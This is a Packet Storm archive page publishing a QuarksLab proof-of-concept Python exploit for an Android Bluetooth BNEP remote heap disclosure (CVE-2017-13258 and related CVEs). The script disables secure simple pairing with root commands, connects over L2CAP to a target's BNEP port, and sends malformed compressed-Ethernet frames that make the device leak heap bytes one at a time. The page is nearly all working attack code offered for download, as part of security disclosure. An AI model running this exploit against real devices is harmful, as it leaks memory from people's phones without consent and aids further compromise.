what you don't know can hurt you

Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure

Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure
Posted Mar 23, 2018
Authored by QuarksLab

Android Bluetooth BNEP bnep_data_ind() remote heap disclosure proof of concept vulnerability.

tags | exploit, remote, proof of concept, info disclosure
advisories | CVE-2017-13258, CVE-2017-13260, CVE-2017-13261, CVE-2017-13262
MD5 | f50c8e71abc6155ddf7f0862fa749a3d

Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure

Change Mirror Download
import os
import sys
import struct

import bluetooth

BNEP_PSM = 15
BNEP_FRAME_COMPRESSED_ETHERNET = 0x02
LEAK_ATTEMPTS = 20

def leak(src_bdaddr, dst):

bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bnep.settimeout(5)
bnep.bind((src_bdaddr, 0))
print 'Connecting to BNEP...'
bnep.connect((dst, BNEP_PSM))
bnep.settimeout(1)
print 'Leaking bytes from the heap of com.android.bluetooth...'

for i in range(LEAK_ATTEMPTS):
# A byte from the heap at (p + controlled_length) will be leaked
# if it's greater than BNEP_FILTER_MULTI_ADDR_RESPONSE_MSG (0x06).
# This BNEP packet can be seen in Wireshark with the following info:
# "Compressed Ethernet+E - Type: unknown[Malformed packet]".
# The response sent by bnep_send_command_not_understood() contains 3 bytes:
# 0x01 (BNEP_FRAME_CONTROL) + 0x00 (BNEP_CONTROL_COMMAND_NOT_UNDERSTOOD) + leaked byte

# 0x82 & 0x80 == 0x80 -> Extension flag = True. 0x82 & 0x7f == 0x2 -> type
type_and_ext_present = BNEP_FRAME_COMPRESSED_ETHERNET | 0x80

# 0x80 -> ext -> we need to pass this check: !(ext & 0x7f)
ext = 0x80

# i -> length (the 'p' pointer is advanced by this length)

bnep.send(struct.pack('<BBB', type_and_ext_present, ext, i))
try:
data = bnep.recv(3)
except bluetooth.btcommon.BluetoothError:
data = ''

if data:
print 'heap[p + 0x%02x] = 0x%02x' % (i, ord(data[-1]))
else:
print 'heap[p + 0x%02x] <= 6' % (i)

print 'Closing connection.'
bnep.close()


def main(src_bdaddr, dst):
os.system('hciconfig %s sspmode 0' % (src_bdaddr,))
os.system('hcitool dc %s' % (dst,))

leak(src_bdaddr, dst)


if __name__ == '__main__':
if len(sys.argv) < 3:
print('Usage: python bnep01.py <src-bdaddr> <dst-bdaddr>')
else:
if os.getuid():
print 'Error: This script must be run as root.'
else:
main(sys.argv[1], sys.argv[2])

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    32 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    10 Files
  • 17
    Feb 17th
    2 Files
  • 18
    Feb 18th
    27 Files
  • 19
    Feb 19th
    32 Files
  • 20
    Feb 20th
    15 Files
  • 21
    Feb 21st
    17 Files
  • 22
    Feb 22nd
    12 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close